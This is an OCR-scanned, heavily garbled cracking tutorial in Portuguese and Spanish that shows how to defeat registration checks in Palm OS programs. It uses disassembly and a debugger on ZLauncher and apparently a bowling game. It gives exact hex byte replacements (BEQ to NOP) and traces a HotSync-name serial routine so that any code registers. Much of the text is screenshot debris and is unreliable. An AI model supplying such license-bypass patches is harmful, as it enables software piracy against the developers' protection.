++ 1220 Sobresenbir árchivo MOVE.  Ff1001'$3e9,-(17) ; Registro E 
E + 1 Sobrescribir Base de Dato: TRAP R15,$2192 = sysTrapFrmilert 
+ + 1300 Borrar Archivo LEA 26(47),A7 
+ + 1310 Sin Nombre BRA 26 
+ + 1400 Borrar Directorio de R 
+. + 1410 Copiar Directono TRAP $15,$4192 = sysTrapFrmilert 
+. + 1420 Mover Directono 7 MOVEO R1,D3 
+) 1440 Crear Directorio 544f ADDQO.W  H2,147 
+ + 1500 Ir a Directorio 000 6020 BRA 2 
+ 1600 Prevención de copia 000 4a2dcb04 L264 TST+B -13564 (45) 
++ 1700 Borrar lcono OOO 6715 BEQ L265 
v* 120 Perinmerar 437 1 PEI énadaaa. Y 


hs >» 1 UL DOLONIOL ILLIA 


PEZ $0000.1 Y 


+ 1800 Recuperar 


ss IAEA ») a 
4 Iniciar "to Mr E:Arquivos d... ZLauncher_S... Ti Documentol -... Palm OSQ Em... ¿ ¿ Preedit pT msvom 2) 982 21:20 


Figura 3 


A — Localizamos em “Alerts” o número 1002 da Talt. Expandimos e verificamos as “Referéncias”. O número 00002224 representa a linha do programa que chama a 
Talt. Clicamos na referéncia 00002224 e o código aparece (no lado direito da tela). 


Agora nos perguntamos: Quando a Talt aparece? 


A resposta é: Quando digitamos um número de registro inválido. 


B - A instrucáo BEQ L263 significa que o fluxo será desviado para a linha identificada por L263caso algum teste seja satisfeito. Essa linha exibe a Talt. Entáo 
concluímos que a instrucáo BEQ L263 desvia o fluxo para a Talt caso o número de registro seja inválido. 


Se o número de registro for válido entáo o fluxo náo desvia para L263 e continua logo abaixo do BEQ L263. Veja figura 4. 


A —- Localizamos en “Alertas “ el número de la Talt 1002, Expandimos y verificamos en “Referencias” el Número 00002224 , que representa la linea de 
llamada a la Talt, Damos click en esta referencia del programa 00002224 y se muestra la instrucción del código (Ver lado derecho de este código) 


Nos Preguntamos : ¿ Cuando debe aparecer está Talt ? 


La repuesta es : Cuando introducimos un número de registro invalido 


B - La instrucción BEQ L263 significa que el flujo de instrucciones sera desviado a la linea identificada como L263 si el resultado del testeo es 
verdadero, Entonce esa linea nos mostrará una Talt, Deducimos que la instrucción BEQ L263 desvia el fluxo hacia una Talt cuando el registro del 
software es invalido. 


Si el número de serie introducido es correcto ,entonces la instrucción L263 continua hacia abajo BEQ L263 . Ver figura 4. 


Preedit - [code0005.s] 
1d File Edit View Tools “Window Help - 0 X 
codeD001. 1 code0002.</ code0003.s | codeD004 | code 4 » | 


a Pesources 3f0: MOVE . Y 
Za Forms 2746 2£0: MOVE. L 
Za álerts qe4falo3 TRAP 
+ 1000 Período de prueba vencid: 2r4s ¿645 MOVEA.L 
+ 1001 Registro Exitoso! 00002106 ; MOVE. 

1002 Fallo de Registro 3 00002105 MOVE.L 


A TRAP 
MOVE. L 


TRAP 

2 MOVEA.L 
2 MOVE. L 
1010 tema Incompatible 4 J3R 

1020 Sin Espacio Suficiente de 4aD TST.B 
1030 Error q4fefODla LEA 

1040 Tema instalado no disport ¿ 'BEQ 

1050 Tema no disponible MOVEA.L -13568/15),40 
1060 Fondo no disponible MOVE.B H1,(20) 

1070 Log de Error A CLR.L , 
1100 Nombre de Pestaña Errone 2763 ¿fDa eii HOWE. L 
1110 Borrar Pestaña 2760 48650006 ayalzdo PEA 
1120 Borrar Pestaña 2765 21f6 q4e4faDos iria TRAP 


ma pa 7 la linea Ñ 
1130 Pestaña de Transmisión 1263 MOVE.B 


A 


aysTrapFrmceróbje 


1 
y 


yaTrapFrmsetFocu 


> 00006948 ] de = sysTrapF ldtet Text 
1003 HotSyne 1D ¿ 22 
1004 HotSpnc 1D 


0 
0 
pp 
Ly 
10 


Hu 
Ox+4¿ 
o 


U 
a 
H 
in 
q 
19 


si el 
número de 


Si el 
Ninsero de 
registro es 


1150 Mezclar Pestaña ¿ ooo valido que MOVE. V A7) 
1160 Copiar todas <4ala Tarj ¿  OO000 continue el MOVE. L ¿=(A7) 
Ñ ¡ ¿ ooo fluxo del dí MOVE.L FH16646145'$fe0001,- (17) 


DoODo 


codigo , 
entonces se 
muestra el 
mensaje de 
Registro | TRAP 
1300 Borrar árchivo ¿ ; E Susbssa LEA 
1310 Sin Nombre erro EA 602 BRA 
1400 Borrar Directorio 
1410 Copiar Directorio : OODO 4e4fal92 TRAP 
1420 Mover Directorio 2778 q MOVEO 
1440 Crear Directorio ¿ 54: ADDO.W 
1500 Ir a Di 6020 ERA 
1600 Prevención de copia 1 0000 4aldcboO4 L264 TS Te 
1700 Borrar Icono ¿ 6718 BEQ 


1800 Recuperar 2783 000022 487580000 PEA 


MOVE.L  f$151494741 
TRAP $15,$42D4 
MOVE.W H$1001!$3e9,-(47 


eu 
$S5Sa9c4352,-(A7) 


par 
Setipp 


o 
= aysTrapFrmilert 


 DODO 


TrapFrmilert 


J 


L265 


$D000.1W de 


Y 4d) A As AA As As A A A A A A A A A A A A A A AY AY A AY A A 


si el número de registro es ? 


Ln 2776, Col 1 valido continuar código 


2 Iniciar ww 6 O A E: Arquivos d... ZLauncher_S... (Y Documento -... Palm OSQ Em... + <Prcedit B 21:20 


Figura 4 


O que devemos fazer? 
Devemos fazer com que o programa NUNCA desvie para L263. Pra isso, temos de substituir a instrugáo BEQ L263 para.... NOP. 
NOP significa No OPeration: nenhuma operacáo, ou seja, náo faca nada. 


Para alterar, clicamos em BEQ L263 (veja o cursos piscando em cima do BEQ) e teclamos F9. Veja figura 5. 


¿Qué es lo que debemos hacer? 


Debemos de hacer que el programa nunca vaya a la instrucción L263, Para ello, Debemos de sustituir la instrucción BEQ L263 por ..... NOP. 


NOP significa No Operation: Nunca operar, Osea no hacer nada 


Para cambiar la instrucción clickamos en BEQ L263 (Posicionar cursor sobre la BEQ) y tecleamos F9, ver figura 5. 
Se o número de registro for inválido vá para a linha L263 


Si el número de registro es invalido que vaya a la linea L263 


Se o número de registro for válido continua o fluxo e exibe mensagem: Registro Exitoso 


Si el Número de registro es valido que continue el fluxo del código , entonces se muestra el mensaje de Registro existoso 


¿ Preedit - [E-Wirquivos de ProgramasiStanleyWPalmiCrackPRCsWLauncher_Spanish. patched.prc] 
+ File Edit Insert View Tools Window Help 0 xXx 


TY resources Bm 0: 2F0C 4EAD EF68 2004 504F 6714 3F3C0 0001 “.N-1h .POg . ?< ; 
24 Forms x12800: 2FOA 2057 2268 OD0A 2269 0008 4E91 5C4F /. Wih. "iO 
Y Alerts Ox 800: 970B 1F07 2F06 2F0C 2448 2004 JNE. ¿NL !1SH 
1000 Período de prueba vencid: ; : 4FEF 000A 6712 2F0A 2057 : DOOA 2269 01..9./. Wh.."i 
A ao tenlosS 0018 4E91 584F 607A 7601 6076 9DCE 4857 y 
1002 Fallo de Registro e a ARA y A Oca AA 
A 4EAD EF92 2580858 B4F 6768 44565 6622 2F04 
2F0A 4EAD EFSC 504F 3FDO 2F2D CASE 4EAD 
48 7D8 584F 2F08 4EAD ED34 2648 5C4F 6026 
1003 HotSyne 1D 0x12930: 2F04 4EAD FOBE 2608 584F 6718 2F03 2F2D 
004 HotSync 1D 940: CASE 4EAD F7A2 2648 2F03 4E4F A012 4FEF 
1010 Systema Incompatible 000C 6002 97C0B 7601 6018 + ; 
0 00% 3F2F ODOA 4EAD F4D2 Mc ea byte 
4403 6700 FDBO 1870 que se cambiara 
4E4F 4175 3P007 
3F30€ 0001 
4E91 504 
48E7 18; 
DOCO 3/2A 0008 0440 0515 6700 0440 f..A0*...0..9..60 
: 29D0: DO00C 6700 ÁOBE 6000 ODAA 4E4F A173 2448 Pd: 
1130 Pestaña de Transmisión 9ED: 3F3C 0517/2F0A 4E4F A180 3800 3F04 2F0A ?<../.NO11B.?./ 
A oe x129F0: 4E4F A1% 2648 3F04 2F0A 4E4F A179 2FO0B S "NO ¡y 
1170 Coi todos los A ao 2448 2F0A 4EAD FS6E 4400 4FEF N-5nJ.01 
1 S 0014 B740 206D CBOO 108€ 0001 42238 0002 e 
2F0A 4868 0006 4E4F A0CS 1F3C 0001 3F30 
0010 2F2D CBOO 2F3C DOFE 0001 2F3C SA4C  ../ ¿bir eZ 
obreseibl Basado Dll A40: 4352 4E4F A2D4 3F3C 03E9 4E4F A192 4FEF CRM NO ¡“01 
ar Archivo z12A50: 0014 602E 3F3C O3EA 4E4F A192 7601 544F iS éXNOi“wv.TO 
A x12A60: 6020 442D CB04 6718 4878 0000 4878 0000 * J-E.g.Hx..Hx 
dad AO. Den oa ardd cono dear is ree apo Mis BuonioL 
ODM da Die AS0: 7601 1003 4CDF 0018 4E75 48E7 103A 4FEF v...LB..NuBc. :04 
1440 Crear Directorio x12A90: FFCA 426F 0034 42A4D CBOO 990C 4878 0010 yEDo.4B-E. Hz... 
1500 lr a Directorio ABAD: 4E4F A013 2B48 CBOO 5984F 6604 3F70 0102 NO .+HE.XOf.?]|.. 
1600 Prevención de copia 2ABO0: 0034 6000 0164 2F2D CBOO 4EBA D1AC 1.4 j/-E.N2.Hx 
1700 Borrar Icono 5 “20: 0000 4878 0000 456E 00 y0c 4878 0000 48785 HE O y d 


000 a ..H 
1800 Recuperar “Mo0x12A4D0: 0000 4878 0000 4E4F A 3F40 0050 4FEF.  ..Hx..NOcÉ 
NAFN AFA 4109 FOTE De 


a O 
Y h . J I f "wz ; 


En L rat 


O  <XS OO 


020 Sin Espacio Suficiente aan: 
1030 Error > % > 
1040 Tema instalado no disport " 


Med 


al 8 . o 
1050 Tema no disponible 300: 


1060 Fondo no disponible Z ALEJSOS- B y : 
1070 Log de Error 340: 000 
1100 Nombre de Pestaña Errone D: 4E7 


Or 


204B 4FEF ¿ny 
246F 0014 7600 0052 0009  NuHg.O$o..v..R.. 


UP Eo 


LA 


Y 44460 AA AA A A A A AY A A A A A A AY A A A AY A A OA OA e e 


Nn+1923¿*RnN-* ANA Na a4ñ17 AMNE 


Pos: 12412h,76306 La Resource: code, 0005 


“Iniciar Mm EDO >? lrEñArquivosd.. | ZlauncherS...  UlComopatche... | PalmOSQEm... ¿ ¿Prcedit mom € €) 118 37 
| y, 


Figura 5 


Veja o cursor piscando no byte code 6740. Temos que alterar para NOP. Pra isso podemos digitar 4E71 em cima do 6740 ou clicar no menu “Insert” (veja figura 6). 


Nos posicionamos con el cursor en el código del Byte 6740. Tenemos que cambiar por un NOP, Para ello escribimos un 4E71 sobre el 6740 Y damos 


click en el menu “Insert” (Ver Figura 6). 


Con Ultraedit32 10.00c www.ultraedit.com buscamos la cadena hexadecimal 


“4F EF 00 1A 67 40 20 6D” 


Que es la misma para las versiones de Zlauncher 5.4 Build 060220 y ZLauncher v5.41 Build 060417 una vez encontrada esta cadena solo tenemos que 


reemplazar la misma por la cadena hexadeximal 


“4F EF 00 1A 4E 71 20 6D” 
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5d File Edit PGE34% View Tools Window Help 


From asdemkQjer 


E Resou  60(BRA) + [(10x128B0: 
+ Fc 66(BNE) 0x128C0: 
JJ Al 67(BEQ) Yi 128D0: 
+9 4E48 (TRAP into debugger) 0x 1238; 
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Figura 6 


E clicamos em 4E71 (NOP). 


Cickcamos sobre está instruccion y la cambiamos por un (NOP) 4E71 


O código fica conforme a figura 7. 


El Código que hemos Parchado (modificado) queda como se muestra en la figura 7. 
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Agora salvamos o arquivo e fazemos HotSync do Zlauncher_Spanish.patched.prc (veja figura 8). 


Ahora guardamos los cambios del archivo y hacemos un Hotsync del archivo parchado como Zlauncher_Spanish.patched.prc , (Ver figura 8 ). 


Arquivo Editar  Exibir Favoritos  Ferramentas Ajuda 
Q S y q | X <) [E33]- 
Endereco 7 ExArquivos de Programas! ¡Palm CrackiPRCs y > Ir 
Pastas Xx Nome Tamanho Tipo Data de modificacáo 
+ (O) HB++ A | 2l5412.zip 3.364 KB Pasta compactada (zipada) 14/6/2006 09:18 
+ (5) Hp489+ 3) code0000,bin.s 1KB  Arquivo S 9/4/2006 21:51 
+) (5) Instalacáo E bejeweled2-music.pdb 755KB  Arquivo de banco de dados da Palm 26/11/2004 12:17 
+) (5) Microsoft Visual Studio [9] code0000,bin 1KB  Arquivo BIN 9/4/2006 21:51 
Ly NG y ZLauncher_Spanish.pre 495KB Aplicativo Palm 16/6/2006 09:19 
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(5) Code Warrior 3 PocketC.pre 139KB Aplicativo Palm 22/3/2006 21:40 
+ (3 Components y PocketC,patched.pre 139KB Aplicativo Palm 9/4/2006 22:19 
= (3) Crack [ña] Pikoban.PRE 88KB Aplicativo Palm 14/12/2005 21:22 
(y) Debuffer [FS] Bejeweled2.prc 1.440KB Aplicativo Palm 22/3/2005 16:29 
+ () Debugger y Bejeweled2.patched.pre 1.440KB Aplicativo Palm 1/5/2006 01:39 
+ (5) Emulador vb Pasta de arquivos 31/7/2005 21:11 
E) PalmdeMON Patches Pasta de arquivos 16/6/2006 21:52 
(5) Patch PRCs HB++ (5 oOriginais Pasta de arquivos 27/4/2006 21:43 
(y PRC2BIN 
(y PRCEdit 
" led dd Arquivo patcheado. Fazer HotSync degse 
30 $ : 
5) Originais pd id 
0) Patches 
O vb 
+ 4] ¿54 lz.zip Archivo parchado. Archivo al que 
+ (5) Simulator 
3 ÉS) southDebugger haremos un Hotsync a nuestros PDA 
+ (5) Tutoriais 
(0) x-master 
+ (2) EZAsm.zip 
2] pda-palm-os-develc 
+ [2] Piloc_Monitor. zip 
+ (27 pilrc-3.2-win32.zip 
£ > 
17 objeto(s) (espaco livre em disco; 36,8 GB) 10,5 MB ¿ Meu computador 
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a" Como patchear o 2l... 


op ZLauncher_Spanish.... 


MED” MM EnArquivos de Prog... 
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Figura 8 


Agora executamos o ZLauncher no palm e digitamos qualquer número de registro. Veja figura 9. 


Ahora ejecutamos Zlauncher en la Palm y escribimos cualquier número de registro,Ver figura 9. 


Registrar 
Para registrar y obtener la 
versión completa, visite a 
vw handango.comfpurchase 
e ingrese 42086. 


Tiene 30 dios que quedan para pre 


Código de Registro 


E 


[Registrar | bntinuar Evaluacid 


Figura 9. 


Agora clicamos em Registrar e veja a figura 10. 


Ahora Clickcamos en registrar, podemos ver la figura 10. 


—" Palm 0568) Emulator 


promsvom E €)20E8 21:53 


Registrar 


Para registrar y obtener la 
versión completa, visite a 

ww handango.corm/purchase 
e ingrese 42086. 


Tiene 30 dios que quedan para pre 
Nombre de Usuario (HotSÍ HE: ) 


Registro Exitoso! 


(3) Gracias por registrarse. 


[ Listo ] 


Figura 10. 

Agora o programa está registrado. 

Ahora el programa está registrado. 

Adelantamos el reloj de nuestros PDA y parece que no nos da mas problemas está sencilla aplicacion, Protección pequeña = software malo. 
Afer Ventus 

Brasil 


Post nubiladWyahoo.com.br 


Hasta la vista desde 
Brasil 


Post_nubilaOyahoo.com.br 
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Juego de Bolique , Solo permite jugar Ciertas partidas y se bloquea posteriormente 


Encontrar la rutina que limita el juego y parchar instrucciones 


()NewBies ( )Intermedio ()Avanzado (X)Master ( )Gúru 
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Wersion 1.0p 
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Jason Goldman 
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Updates and registratlon 
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copyright 2002 
all rights reserved 
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Fig. 1 


Fig. 2 


As restricó0es sáo (vide fig 3): 


5 frames (ou partidas) 


Engquanto náo é registrado, a opcáo Register aparece no menu (vide fig. 2). 
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Enter your unlock co 
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to purchase your unlock code 
ond enable all featur 


tPalmáear corn 
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DBerno limited to 5 frarnmes and 1 player 
Derno runs remaining: 19 


[ Concel ] [ Register ] 


1 jogador (náo é possível jogar contra o Palm ou 2 jogadores) 


20 execucóes (após isso o usuário náo consegue rodar o demo) 


Ao digitar um código qualquer a Talt da fig. 


4 aparece. 
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Fig. 5 
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Agora, localizamos a Talt no PRCE 


6). 


Vamos ver o código: 


dit. 


Em References, 


Fig. 6 


damos um duplo clique e a referéncia a Talt no código aparece a direita (vide fig. 


00000684 4e90 JSR (A0) ¿rotina que verifica serial 
00000686 4a2a000c TST.B 12(A2) ¿registro OK? 

0000068c 3f3c03ea MOVE .W +1002!$3ea,-(A7) ¿se registro OK passa por aqui 
00000690 4e4dal92 TRAP $15, $A192 ¡e exibe a Talt de registro OK 
00000694 3f3c03e8 MOVE .W +1000!$3e8,- (A7) 

00000698 4e4fal%b TRAP $15, SALOB 

000006%c 4ledfb74 LEA -1164(A5),A0 

000006a0 117c00010001 MOVE .B $1,1(A40) 
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000006aa 3f3c03eb L55 MOVE .W $1003!$3eb,-(A7) ¿se registro inválido, passa 
000006ae 4e4fal92 TRAP $15, $A192 ¿por aqui e exibe a Talt de 
000006b2 6000£f28 BRA L52 ¿registro inválido 

O código que nos interessa é o seguint 

JSR (AO) - Chama uma subrotina enderecada por AO (náo sabemos qual) 
TST.B 12(A2) - testa o byte enderecado por A2 + 12 

BEO L55 - val para O label L55 se o teste for Ok (byte em A2+12 = 0) 


Precisamos entáo descobrir qual é a rotina enderecada por A0 e o que ela faz com o byte enderecado por A2+12. 
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disassembler breakpoints trap stack breakpoints memory dump register memory dump 


FF breakpoints 
breakpoints | trap breakpoints cond. trap breakpoints find: frrnalert 


sTrapFrmcetClontrolValue 


NOT SET 5 rapFruSetlontrolValue 


7 o] 


in 
re 
to 


NOT SET 
NOT SET 


Er m 
PE 
te 


to 
mn 


NOT SET 


[12] 
Pm 


NOT SET 113 rapFrmCetLabel 
sTrapFruSetlategorylabel 

[2190] <=TrapFrmcbetTitle 

[2191] 


von 
O 


Le] 


10013: g- 671: EE $20!$l4 ¿Pr 
1001 IA 1F3COOlE MOVE. B30!$lE, -( 
10013 a, 3F3C2710 MOVE. 0 $10000!13271 
10019840  “<MIDI ¿F3C4D... MOVE. 12596647241 
100198 NO.n d4E4FAS6E TEAP Hl1S!7F, f£41l 
1001 PO 504F ¿DD OM $33, A7 
1001 a? 2001 MOVEO $31, DO 
100198 bi 600003D4 ERA Faso !I$3Da ; 
100198B J. 42403 TST.E D3 

1001 Y - 67045 EEQ Fl10!52 ¿Prw A1092 
1001 e e 1F3C0003 MOVE.E FF3, - (47) 

1001 : 4E4FA234 TPAP $1S5S!3F, $41 

1001 544F ADDO.W o $32, 47 

1001 a. 2001 MOVEO $?$1, DO 

100198CE *... ERA F960!173C0 ¿PrvHandleEvent+00000D94=.. 


<ysTrapFroDobialog 

sysTrapFrmiustomilert 
sTrapFrmHelp 
sTrapFrmnUpdateScrollers 


A 
00 an $e 


rapFrmbetFirstForm 
<=TrapFroVisible 


oo 


70 


40 


PruHandleEvent 
10019 7001 MOVYEO $1, DO 
¡Z Iniciar O) fr E:Arqui... TE) 300Bow... —* Palm OS... Prcedit £X southDe... 3 couthDe... PT 0 4) 215 23:24 


Fig. 7 


Abrimos entáo o programa no southDebugger e setamos um breakpoint na trap das Talts 


* southDebugger v1.7 - UNREGISTERED 


File Execution 


lB 


Window Tools Plugins Help 


6 (2145 CB EE 009 


(sysTrapFrmAlert) 


conforme fig. 


qa 


| disassembler l breakpoints | trap stack | breakpoints | memory dump l register | memory dump | 


main | 


disassembler 


[aisassembter A 


p addr 


CIEJEIKIPIP> 


dechex y 0007D4C0O 
| 


command 


pono?Daco 
| 0007?D4C4 
looo7pace 
| DODO?7D4ACA 
| D0O07D4CE 
0007D4D0 
NODO?D4Da 
looo7baDe 


O0O7D4 EA 
ODO 7D4 EE 
PODO?DAFZ 


fOCO?D<FE 
MODO7DAFA 
l 


MODO?DSOO 


' 
' 
Í 


| OO0O07?DSOd 


p 
lo0oO7DSs10 


| DOO?DS1Z 


35400004 


¿D06DE920 


4E4FAL9B 
41EDFE”74 


117cC00... 


SO000FF3d 


4CEEOC... 


EXT. 
MOVE. 1 
MOVE.E 
EXT. 
MOVE. 1 
MOVEA. L 
ADDA.L 
JS. 
TST.B 
EEN 
MOVE. 
TRAP 
mov 
TRAP 
LEA 
mov 
BEA 
MOVE. 


BRA 


CLE.W 
MOVEM. L 


F34 120), DO Ñ 
DO 

DO, £ 

FF55S(20), DO 

DO 


DO, $10!/$21(22) 


Novo breakpoint 


(Nuevo 
Breakpoint) 


¿ODO?DSOS 


[sysTrapFrmilert] 


[sysTrapFrmbot... 


2 


CB 54 


DO 
f-104 13-68 146) 


22 
D2 


A3 


Do 
79 


oo 


DO 
6F 
Do 
6F 


O 


0007?Dsos 


x 
y 


B15!S5F 


Mw E:árqui... 


F41362 54102 


(5) 30080w... 


avaTrapFrmilert 


— Palm OS... : * Preedit 


£5 southDe... 


southDe... PT. MSYDM 


8 €). 2D 23:25 


Fig. 8 


Após digitar o código inválido, o programa pára no breakpoint na trap sysTrapFrmAlert e entáo setamos um novo breakpoint na linha JSR (AO). Pra isso, clique sobre a linha com o 
botáo direito do mouse e escolha set breakpoint no menu pop-up (vide fig. 8). 


'= southDebugger v1.7 - UNREGISTERED Ea 
File Execution Window Tools Plugins Help 


¡BEA CIELO 


| disassembler | breakpoints | trap stack | breakpoints | memory dump | register | memory dump | 


main | 


E disassembler 


pres [e] 


addr ascii EY cornrmarid 
O007D4CO  .(.. 00 y ; F34r20), DO 
DO0O0?D4Ca 5 k po 
D0O0?7D4Có a... MOVE. DO, F$38122) 
ODO7D4ACA .(.. MOVE.B ÉS51A0D), 
O007D4CE ' . EXT. DO 
O0O0?D4DO S54.. 3 OOO MOVE. .W DO, £l10!/5A1(22) 
O007D4D4  .m.. ¿D06DESA40 MOVEA.L f-S5?28!13-16601A45), 20 
0007D4DS í DIFCOO... ADDA.L F2cn00!1jAzo, 47 
0007D4DE 
DOO7?D4EO Je. IAZADOOC TST.B 
DO007D4E4 q. 67 EEQ F30!F1E ¿O007D5O04 
ODO7D4AES ?=<.. 3F3COSEA MOVE. $£1002 SEA, -(247) 
ODO7?D4 EA Aia 4E4F2A192 TERAP FF, $41: FA192 [sysTrapFrmilert] 
ODOPD4EE ?=<.. 3F3COÓSES MOVE. $£l1000!$3E8, -(A7) 
O0O7D4FZ 2% 4E4F215E TE2P F1IS!IF¿F, f41371/$A19E [sysTrapFrmcot... 
0007D4F6 A. 4l1EDFE?4 LEA f-1164!3-438C/(45), A 
ODO?D4FA .|.... 117000... MOVE.E $?l, £71(20) 
ODO7DSOD  *..< 6000FF34 BRA $-204!$-CC 
D007D5Os 1 SF3COSERE MOVE. £1003 

4E4F2192 TRAP $F1S!7F, 

ODO?DSOL  *..4 6000FF23S BRA $-216!7-DS ¿0007D436 
o007Ds10o J0l 4240 CLR.W DO 
o00?7DSs12Z [e 4CEEOC... MOVEM. L 


dle nn 
Md fe 


a A 


Na] 


o 
om 


JJ HH 


Dn mn 
a 


73 6F 6l urchase your ul 


NN 
y 
o 


oo 00 


ock 


Tm 


CS 


ODO?TDADE 4E90 JSR [A01 [=$$0 


DD /D4DE 4E29L) JOR ¡[201 [(=%5L) 
Mr E:lArqui... Ci) 300Bow... 


=' Palm OS... Preedit £32 southDe... 


¡3 Iniciar 


* southDe... PT 6 42 150 23:25 


Fig. 9 


Teclamos F5, voltamos ao POSE e digitamos novamente o código inválido. Agora o southDebugger pára no novo breakpoint conforme a fig. 9 


EJ 


* southDebugger v1.7 - UNREGISTERED 


File Execution 


Ba dE (91 00 


| disassembler | breakpoints | trap stack | breakpoints | memory dump | register | memory dump | 


main | 


| disassembler [PC] 


pres [ejonea 


command 


O00O7BSBE 
o0o07B! 

DOO7BSCE 
O0O7BESCA 
DOO7BSOC 
ODO7?BESDO 
ODO7?BSDZ 
0007BSDE 
DOO7BSDA 
OD0O7?BSDE 
DOO7?BSE4 
DOO7?ESES 
DOO7BSEA 
DOO7BESEC 
O0O7BSEE 
DOO7BSFZ 
O007BSF4 
DOO7BSFE 
O0O7BSFS 
ODO7BSFA 
ODO7BSFE 


O007?BS00o 


MOVEM. L 
LEA 
TST.B 
BEN 
TST.E 
BEQ 
TST.E 
EE0Q 
MOVEA. L 
ADDA. L 
JSR 
ERA 
CLP.L 
a CLP.L 
45EEFFE0O LEA 
¿FOA MOVE. L 
CLR.L 
CLP.L 
CLR.L 
TEAP 
CLE. 1 
CLR.W 


A2BODOC 


fAS/A )5/D4/D3, 
$-3736!1$-E98(A5), 
$-14068!14-236F4 125) 
F30!f¿1E ¿ODO7BESEA 
$l2!1$C 143) 
$241$18 ¿ODOTESEA 
$-1406712-36F31(A5) 
$904!$388 ; 


$-5724!7-165C[(AS) 


e 17 1 
a3 


¿TrapDlkGets 


gnolnto] 


opa 
in ínja 
a UE 


SS 


3 asin ín (n 
A 
LT] 


2x30n0m3n sa 
Saad ase 
2333-00 
NN > E > 


A! 
Hb 


3 30 
6l 74 
o 00 


(us) 


Do A a A 


Pegistration... 


ock 


COde: ost. á 


Hot=yne 


DOOTBSBA 4ESÉFFAC LINK 
¡3 Iniciar O 


Agora teclamos F8 (passo a passo) e estamos dentro da rotina chamada por JSR (AO) 


Observamos que a rotina chama a trap sysTrapDlkGetSyncInfo, 
Ccaminho certo. 


$04 15-54 


5) 300B0w... — Palm OS... 


Fig. 


Preedit 


£3 southDe... 


que retorna o HotSync name do Palm. 


E couthDe... PT 


8 2 2850 23:26 


conforme a fig. 10. 


Isso já é um indício de que estamos no 


HE Resources 
E] Forms 

E-£3 Alerts 

+ 1000 Direct Color 

+ 1001 Unable to run prograr 

+ 1002 Registered 

+ 1003 Not Registered 

2 2] References 
000006 

1004 Cant run 300 Bowl 

1005 Quick Help 

1006 Post your High Score 

1007 Game ln Progress 

1008 Install HiColor Wersior 

1009 Install 256 Color ers 

1010 Install Grey16 ersior 

1011 Install Greyd e 

1012 Device Not Supporte 
1013 Memory Card 

Strings 


El 


(1)--[+]-[+ 


=10ñn 


9 PB694e. 1/1... . 4. 2 


e) ell + 


PPDEDDEe 2-4--0-E-0-E-E-E 
a 
a 


Kepworde 
Changes 
Search Results 


3006 oHighCo 


ho] 
o 
0 

15%) 
aj] 


co cc 0 
a 
LO Oo 
O 
oo 


Gb ta ta 
o 


0 ra 
o 


o 
Lo 
NS 


O A E] 


La 
[00] 


DO 00 00 0 
o 
5 


E; 
a 
3 


32 
3 


C Operation: 


a) 
Se 


q4e75 

qgeS5Sótffac 
4se71c35 
4?edr165 
q4azgde9Oc 
67le 

q4azbo0no0c 


Textto find: 


RTS 


LIME 
MOVEM. L 


LEA 


TST. 


BEQ 


TO T: 


(e Search only 


Optiori: 


0 0 0 (0 0 (0 
LS O A] 
OOO 

ss y 


0 0 0.0 0600 


10) 


fe 
Dv 


o 
y 


LN] 


co 


ma 


a] 


LS] 


Hh Ek fk £ hh hh hh E +£ 
“Dn FT h pa 


o 


0 0 (0 0 0 0 60 0 0 00 


Lo o y A] 
mM 


co 0 
A 


Case sensitive 

FO ufhole words only 

Ignore non-spacing characters 
FP Space compression 

TF Regular expression 

IF Prompt on replace 

5cope: 

(e Global CU AllSrc Views 


O Selected text 


Director: 
(e Fornmard 
CO Backward 


Origir 
(e From cursor 


C Fromm home position 


12 (43) 
L70 

-14067 (45) 

Los 

-5724(45),240 

He6/356,10 

(20) 

Las 

- (47) 

- (47) 

-80(46),A2 

A2,- (47) 

(1%) 

- (47) 

- (17) 

$15, $249 = sysTrapDIK Into 
D3 

D2 

24 (47) ,17? 

-14067(45),44 

(12) 

L75 

22,21 

-40(26),40 

O(A1,D2.W),D1 

D1,DO 

H-97!-$61,DO 

$25!/319,DO 

L72 


EHI 
DODa9z O6b01iffe0 ADDI.E 

> OOOODaSé6 gooooooe BRA L7?3 

Do0b0ODada 1001 L72 MOVE.B  D1,DO 


I-$20,D1 


258 DODODasc OSOOffhtf ADDI.E f-65!-$41,DO Y 
2 
IString: Ln 841, Col 58 | 
¡5 Iniciar * lO M% E:iarqui... Dl 30080wl.... PalmOS...  < -Prcedit £5 southDe... ” 8 42 298 23:27 
Fig. 11 
Agora, procuramos pela trap no PRCEdit (vide fig. 11). 
Ao localizar, analisamos o código conforme abaixo: 
0000 TRAP.” H415,$4249 = sysTrapDlkGetSyncInto 
0000 CLR.IW D3 
ooo 4242 Converte CLR.W Dz 
DoODOo q4fef0015 HotSync name LEA 24 (47) ,17 
COOMINTII | 


LEA -14067/(25),14 
TST.B (22) 


29edc90d para maiúsculo 


da 


Ono 673e EEQ L75 
DOD 224%a MOVEA.L 12,21 
ooo e q4leeffíds LEA 3 
OOOO yl 12312000 MOVE.B 
00000276 100 MOVE.BE 

o ADDI.B 


CMPI. 


BHI 


ADDI. 


BRA 


MOVE. 


[us] 


000292 
Dade 


Ca to 


ADDI. 
CMPI. 
BHI 

MOVE. ME 0,D3.W) 


ADDO.t 


Ed 


Se HotSync name < 12 

entáo completa 

HotSync name com 
MOVE.BE R65!13941,-401[161 “B” até tamanho 12 


DoODO Dala 


DoOD0OD0 ale 


00000acé6 147c0042ffd9 MOVE .B +66!1$42,-39(A6) 
00000ace 1d47c0043ffda MOVE.B ++67!543,-38(A6) 
00000ad2 147c0044ffdb MOVE .B +68!$44,-37(A6) 
00000ad8 1d47c0045ffdc MOVE .B +69!1545,-36(A6) 


00000ade 147c0046ffdd MOVE.B +70!546,-35(A6) 


00000ael 422effde CLR.B -34(A6) 

00000aes 7606 MOVEO +6,D3 

00000aea 3403 L76 MOVE .W D3,D2 

00000aec 0c42000b CMPI.W +11!$b,D2 
00000afO0 6el2 BGT L78 

00000af2 4leeffd8 LEA -40(A6),A0 

00000af6 110c00422000 177 MOVE.B +66!1$42,0(A0,D2.W) 
00000afc 5242 ADDQ.W $+1,D2 

00000afe 0c42000b CMPI.W +11!$b,D2 
00000b02 6££2 BLE L77 


=* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


Bee cB EL 00 


] disassembler ll breakpoints Il trap stack | breakpoints | memory dump register l memory dump 


main | 


OODO7D7E 


= 
a 
a 
«j 
Dm 
m 
mn 
m 


hex cornimarnd 


12/13] 


ODO7BEFE a.-p 6100FE7?O ES. $-400!1¿-190 ¿O007BS7O 


00 


00 
00 
on 
0] 
oo 
00 
00 
00 
00 
00 
e) 
go 


oo 


01 


36 01 00 


5 


00 
oo 
oo 
00 
00 
00 00 


oo oo 


